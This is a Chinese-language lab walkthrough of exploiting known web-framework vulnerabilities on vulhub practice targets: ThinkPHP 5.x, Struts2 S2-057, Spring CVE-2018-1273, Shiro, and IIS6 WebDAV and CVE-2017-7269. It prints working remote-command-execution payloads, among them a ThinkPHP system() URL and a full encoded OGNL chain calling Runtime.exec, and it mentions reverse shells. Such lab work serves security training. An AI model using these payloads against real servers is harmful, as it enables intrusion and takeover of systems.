一、Thinkphp5x远程命令执⾏及getshell
1、开启靶场环境,打开网站
2、远程命令执⾏
?s=index/think\app/invokefunction&function=call_user _func_array&vars[0]=system&vars[1][]=whoami
3、 远程代码执⾏
?s=/Index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[
1][]=-1
二、S2-057远程执⾏代码漏洞(vulhub 靶场 /struts2/s2-057)
1、开启靶场环境,打开网站,访问靶机地址 /struts2-showcase/
2、在url处输⼊http://172.16.1.48/struts2 showcase/${(123+123)}/actionChain1.action 后刷新可以看到中间数字位置相加了。
3、将 上⾯验证payload的值修改为我们的利⽤exp
$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23 request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.o pensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getIns tance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcl udedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.cle ar%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Run time@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.I OUtils@toString%28%23a.getInputStream%28%29%29%29%7D
三、spring 代码执⾏ (CVE-2018-1273)
1、开启靶场环境,打开网站 访问/users
2、填写注册信息,bp抓包,加 上 poc :
3、进⼊终端查看,可以看到成功写⼊
4、反弹shell
四、Shiro rememberMe反序列化漏洞(vulhub 靶场 /shiro/CVE-2016-4437)
1、开启靶场环境,打开网站,使用bp抓包查看,验证Shiro框架
2、利⽤⼯具,命令执⾏
3、反弹shell
五、IIS6.x篇 PUT漏洞
1、打开虚拟机,开启 WebDAV 和写权限,⽤burpsuite 提交OPTIONS 查看⽀持的协议
2、⽤PUT上传⽂档,但不能直接上传⽅法脚本⽂档,可以先上传⼀个其他类型的⽂档,然后移动成 脚本⽂档
3、使⽤MOVE命令将其更名为脚本⽂档后缀,使用工具连接查看
六、IIS RCE-CVE-2017-7269
1、开启靶场环境,使用工具反弹shell